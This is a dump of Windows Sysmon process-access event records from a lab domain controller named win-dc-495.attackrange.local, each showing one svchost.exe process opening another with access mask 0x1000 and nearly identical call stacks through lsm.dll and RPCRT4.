13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 